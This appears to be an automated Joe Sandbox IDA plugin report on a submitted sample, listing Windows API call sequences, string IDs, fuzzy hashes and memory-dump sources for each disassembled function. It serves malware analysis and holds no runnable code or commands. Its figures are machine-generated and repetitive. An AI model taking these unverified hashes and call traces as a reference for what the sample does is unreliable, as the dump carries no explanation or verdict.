                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 176396367-1603158881
                                    • Opcode ID: 92c8de4526c174231a1f98b92e529592fd72fabd80d10375b7c0be328aef805a
                                    • Instruction ID: 66b3755c81b3f09aace032ffd4ede7331581d0728769358950d62f3fcc56d4ed
                                    • Opcode Fuzzy Hash: 92c8de4526c174231a1f98b92e529592fd72fabd80d10375b7c0be328aef805a
                                    • Instruction Fuzzy Hash: E3E13732A01596EBCB149FB9C449BFEF7B4FF48710F148229E556E7280DB38AE458790
                                    APIs
                                    • CharLowerBuffW.USER32(00000000,00000000,0081CC08), ref: 007F4527
                                    • _wcslen.LIBCMT ref: 007F453B
                                    • _wcslen.LIBCMT ref: 007F4599
                                    • _wcslen.LIBCMT ref: 007F45F4
                                    • _wcslen.LIBCMT ref: 007F463F
                                    • _wcslen.LIBCMT ref: 007F46A7
                                      • Part of subcall function 0079F9F2: _wcslen.LIBCMT ref: 0079F9FD
                                    • GetDriveTypeW.KERNEL32(?,00846BF0,00000061), ref: 007F4743
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharDriveLowerType
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2055661098-1000479233
                                    • Opcode ID: 344c1ad9b6cf745f0f286fe90fb5e924df0fb7ce149c53fd63359f3a051b9ea2
                                    • Instruction ID: da2385ba9f209c649f66589e93dcf2b53c428bfde949c19e20d5ef57308f48ba
                                    • Opcode Fuzzy Hash: 344c1ad9b6cf745f0f286fe90fb5e924df0fb7ce149c53fd63359f3a051b9ea2
                                    • Instruction Fuzzy Hash: B5B1BC316083069BC710EF28C894A7BB7E5BFA6760F50491DF696C7391E738D944CBA2
                                    APIs
                                    • _wcslen.LIBCMT ref: 0080B198
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0080B1B0
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0080B1D4
                                    • _wcslen.LIBCMT ref: 0080B200
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0080B214
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0080B236
                                    • _wcslen.LIBCMT ref: 0080B332
                                      • Part of subcall function 007F05A7: GetStdHandle.KERNEL32(000000F6), ref: 007F05C6
                                    • _wcslen.LIBCMT ref: 0080B34B
                                    • _wcslen.LIBCMT ref: 0080B366
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0080B3B6
                                    • GetLastError.KERNEL32(00000000), ref: 0080B407
                                    • CloseHandle.KERNEL32(?), ref: 0080B439
                                    • CloseHandle.KERNEL32(00000000), ref: 0080B44A
                                    • CloseHandle.KERNEL32(00000000), ref: 0080B45C
                                    • CloseHandle.KERNEL32(00000000), ref: 0080B46E
                                    • CloseHandle.KERNEL32(?), ref: 0080B4E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                    • String ID:
                                    • API String ID: 2178637699-0
                                    • Opcode ID: db9f9115cd8021919280d33a816bae0f761da98cfee3f13dfe5a4d4344de2b47
                                    • Instruction ID: 6634d74795643fafa30f3f177236d2efba315e08a1febd15a20cdf4d029eefdb
                                    • Opcode Fuzzy Hash: db9f9115cd8021919280d33a816bae0f761da98cfee3f13dfe5a4d4344de2b47
                                    • Instruction Fuzzy Hash: 9EF18931608240DFCB54EF24C885B6ABBE5FF85714F18855DF8999B2A2DB35EC40CB52
                                    APIs
                                    • GetMenuItemCount.USER32(00851990), ref: 007C2F8D
                                    • GetMenuItemCount.USER32(00851990), ref: 007C303D
                                    • GetCursorPos.USER32(?), ref: 007C3081
                                    • SetForegroundWindow.USER32(00000000), ref: 007C308A
                                    • TrackPopupMenuEx.USER32(00851990,00000000,?,00000000,00000000,00000000), ref: 007C309D
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C30A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                    • String ID: 0
                                    • API String ID: 36266755-4108050209
                                    • Opcode ID: b0b8fafed1a959a65dfee1021cfcfce8b756d44d07ae85f9e731cf1ca4ec17ad
                                    • Instruction ID: 107aa4a268e300e4b8d2b6c8dd36206aeee91678a17ae0b82d0bf4521e08d5ab
                                    • Opcode Fuzzy Hash: b0b8fafed1a959a65dfee1021cfcfce8b756d44d07ae85f9e731cf1ca4ec17ad
                                    • Instruction Fuzzy Hash: 12712B71684209BEEB219F28CC49FEABF69FF05724F20421EF514661E1C7B9AD50C790
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00816DEB
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00816E5F
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00816E81
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00816E94
                                    • DestroyWindow.USER32(?), ref: 00816EB5
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00780000,00000000), ref: 00816EE4
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00816EFD
                                    • GetDesktopWindow.USER32 ref: 00816F16
                                    • GetWindowRect.USER32(00000000), ref: 00816F1D
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00816F35
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00816F4D
                                      • Part of subcall function 00799944: GetWindowLongW.USER32(?,000000EB), ref: 00799952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 2429346358-3619404913
                                    • Opcode ID: 8436b2fa1197669d4e1ee4cc27ec4a76044981f475b3fe5fc7f55a0ea26e0f8f
                                    • Instruction ID: aa6bf2eb23b990edf7543a4290d1987bedb0797f316d93fc87f300d759a2393b
                                    • Opcode Fuzzy Hash: 8436b2fa1197669d4e1ee4cc27ec4a76044981f475b3fe5fc7f55a0ea26e0f8f
                                    • Instruction Fuzzy Hash: 917176B0244344AFDB21CF18D848BAABBE9FF88304F54491DF99AC7260DB74A956CB11
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • DragQueryPoint.SHELL32(?,?), ref: 00819147
                                      • Part of subcall function 00817674: ClientToScreen.USER32(?,?), ref: 0081769A
                                      • Part of subcall function 00817674: GetWindowRect.USER32(?,?), ref: 00817710
                                      • Part of subcall function 00817674: PtInRect.USER32(?,?,00818B89), ref: 00817720
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 008191B0
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008191BB
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008191DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00819225
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0081923E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00819255
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00819277
                                    • DragFinish.SHELL32(?), ref: 0081927E
                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00819371
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 221274066-3440237614
                                    • Opcode ID: e207eb513192f2c01fccec1b632549765a5436ae848cd43ecac0795b3ccc368c
                                    • Instruction ID: faebc256d0931c87040be5618af5ae6d88cc4c1fe2a1ff423a4938a54d4327ba
                                    • Opcode Fuzzy Hash: e207eb513192f2c01fccec1b632549765a5436ae848cd43ecac0795b3ccc368c
                                    • Instruction Fuzzy Hash: 33617E71148301AFD701EF64DC89DAFBBE8FF88750F04091DF6A5922A1DB349A49CB52
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007FC4B0
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007FC4C3
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007FC4D7
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007FC4F0
                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 007FC533
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007FC549
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007FC554
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007FC584
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007FC5DC
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007FC5F0
                                    • InternetCloseHandle.WININET(00000000), ref: 007FC5FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                    • String ID:
                                    • API String ID: 3800310941-3916222277
                                    • Opcode ID: 5dec7e92521e9a3b3fa250f7b6ad2f2372f47f5ebbf1f8979ee11712a54ece76
                                    • Instruction ID: 5be0a7f21dac74dfa25006430d1ab3fc3ce941134e29b1d408e376dff3137938
                                    • Opcode Fuzzy Hash: 5dec7e92521e9a3b3fa250f7b6ad2f2372f47f5ebbf1f8979ee11712a54ece76
                                    • Instruction Fuzzy Hash: 79514BB154020DBFEB228F64CA88ABB7BBCFF08754F108419FA5597250DB78E954DB60
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00818592
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 008185A2
                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 008185AD
                                    • CloseHandle.KERNEL32(00000000), ref: 008185BA
                                    • GlobalLock.KERNEL32(00000000), ref: 008185C8
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008185D7
                                    • GlobalUnlock.KERNEL32(00000000), ref: 008185E0
                                    • CloseHandle.KERNEL32(00000000), ref: 008185E7
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 008185F8
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0081FC38,?), ref: 00818611
                                    • GlobalFree.KERNEL32(00000000), ref: 00818621
                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00818641
                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00818671
                                    • DeleteObject.GDI32(00000000), ref: 00818699
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008186AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: b97846c50fae88637e23e043e6ce3f96eee7239bb4c0a438e45de928e83d257e
                                    • Instruction ID: 676342cc2c150be6285f988fe9ec30fe8ca758749c138ce93344e5085d4adcb7
                                    • Opcode Fuzzy Hash: b97846c50fae88637e23e043e6ce3f96eee7239bb4c0a438e45de928e83d257e
                                    • Instruction Fuzzy Hash: 4E412775640208EFDB119FA5DC89EEA7BBDFF99B11F108058F91AE7260DB309941CB60
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 007F1502
                                    • VariantCopy.OLEAUT32(?,?), ref: 007F150B
                                    • VariantClear.OLEAUT32(?), ref: 007F1517
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007F15FB
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 007F1657
                                    • VariantInit.OLEAUT32(?), ref: 007F1708
                                    • SysFreeString.OLEAUT32(?), ref: 007F178C
                                    • VariantClear.OLEAUT32(?), ref: 007F17D8
                                    • VariantClear.OLEAUT32(?), ref: 007F17E7
                                    • VariantInit.OLEAUT32(00000000), ref: 007F1823
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 1234038744-3931177956
                                    • Opcode ID: 24bb6d13947f9c86042f8730e7019ebf16f61872cb6289b14403ed616fa3e7ba
                                    • Instruction ID: eba1b01c075a54210cb00c73ab576144c388951f3fb45e27e945ed7d3863d79b
                                    • Opcode Fuzzy Hash: 24bb6d13947f9c86042f8730e7019ebf16f61872cb6289b14403ed616fa3e7ba
                                    • Instruction Fuzzy Hash: 10D1E471A04119EBDF04EF65E889B7DB7B5BF44700F548056F606AB280DB38ED60EBA1
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 0080C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0080B6AE,?,?), ref: 0080C9B5
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080C9F1
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA68
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080B6F4
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0080B772
                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0080B80A
                                    • RegCloseKey.ADVAPI32(?), ref: 0080B87E
                                    • RegCloseKey.ADVAPI32(?), ref: 0080B89C
                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0080B8F2
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0080B904
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0080B922
                                    • FreeLibrary.KERNEL32(00000000), ref: 0080B983
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080B994
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    APIs
                                    • GetDC.USER32(00000000), ref: 008025D8
                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008025E8
                                    • CreateCompatibleDC.GDI32(?), ref: 008025F4
                                    • SelectObject.GDI32(00000000,?), ref: 00802601
                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0080266D
                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008026AC
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008026D0
                                    • SelectObject.GDI32(?,?), ref: 008026D8
                                    • DeleteObject.GDI32(?), ref: 008026E1
                                    • DeleteDC.GDI32(?), ref: 008026E8
                                    • ReleaseDC.USER32(00000000,?), ref: 008026F3
                                    Strings
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 007BDAA1
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD659
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD66B
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD67D
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD68F
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6A1
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6B3
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6C5
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6D7
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6E9
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6FB
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD70D
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD71F
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD731
                                    • _free.LIBCMT ref: 007BDA96
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007BDAB8
                                    • _free.LIBCMT ref: 007BDACD
                                    • _free.LIBCMT ref: 007BDAD8
                                    • _free.LIBCMT ref: 007BDAFA
                                    • _free.LIBCMT ref: 007BDB0D
                                    • _free.LIBCMT ref: 007BDB1B
                                    • _free.LIBCMT ref: 007BDB26
                                    • _free.LIBCMT ref: 007BDB5E
                                    • _free.LIBCMT ref: 007BDB65
                                    • _free.LIBCMT ref: 007BDB82
                                    • _free.LIBCMT ref: 007BDB9A
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 007E369C
                                    • _wcslen.LIBCMT ref: 007E36A7
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007E3797
                                    • GetClassNameW.USER32(?,?,00000400), ref: 007E380C
                                    • GetDlgCtrlID.USER32(?), ref: 007E385D
                                    • GetWindowRect.USER32(?,?), ref: 007E3882
                                    • GetParent.USER32(?), ref: 007E38A0
                                    • ScreenToClient.USER32(00000000), ref: 007E38A7
                                    • GetClassNameW.USER32(?,?,00000100), ref: 007E3921
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 007E395D
                                    Strings
                                    Similarity
                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                    • String ID: %s%u
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000400), ref: 007E4994
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 007E49DA
                                    • _wcslen.LIBCMT ref: 007E49EB
                                    • CharUpperBuffW.USER32(?,00000000), ref: 007E49F7
                                    • _wcsstr.LIBVCRUNTIME ref: 007E4A2C
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007E4A64
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 007E4A9D
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007E4AE6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 007E4B20
                                    • GetWindowRect.USER32(?,?), ref: 007E4B8B
                                    Strings
                                    Similarity
                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                    • String ID: ThumbnailClass
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0080CC64
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0080CC8D
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0080CD48
                                      • Part of subcall function 0080CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0080CCAA
                                      • Part of subcall function 0080CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0080CCBD
                                      • Part of subcall function 0080CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0080CCCF
                                      • Part of subcall function 0080CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0080CD05
                                      • Part of subcall function 0080CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0080CD28
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0080CCF3
                                    Strings
                                    Similarity
                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007F3D40
                                    • _wcslen.LIBCMT ref: 007F3D6D
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007F3D9D
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007F3DBE
                                    • RemoveDirectoryW.KERNEL32(?), ref: 007F3DCE
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007F3E55
                                    • CloseHandle.KERNEL32(00000000), ref: 007F3E60
                                    • CloseHandle.KERNEL32(00000000), ref: 007F3E6B
                                    Strings
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                    • String ID: :$\$\??\%s
                                    APIs
                                    • timeGetTime.WINMM ref: 007EE6B4
                                      • Part of subcall function 0079E551: timeGetTime.WINMM(?,?,007EE6D4), ref: 0079E555
                                    • Sleep.KERNEL32(0000000A), ref: 007EE6E1
                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 007EE705
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007EE727
                                    • SetActiveWindow.USER32 ref: 007EE746
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007EE754
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 007EE773
                                    • Sleep.KERNEL32(000000FA), ref: 007EE77E
                                    • IsWindow.USER32 ref: 007EE78A
                                    • EndDialog.USER32(00000000), ref: 007EE79B
                                    Strings
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007EEA5D
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007EEA73
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007EEA84
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007EEA96
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007EEAA7
                                    Strings
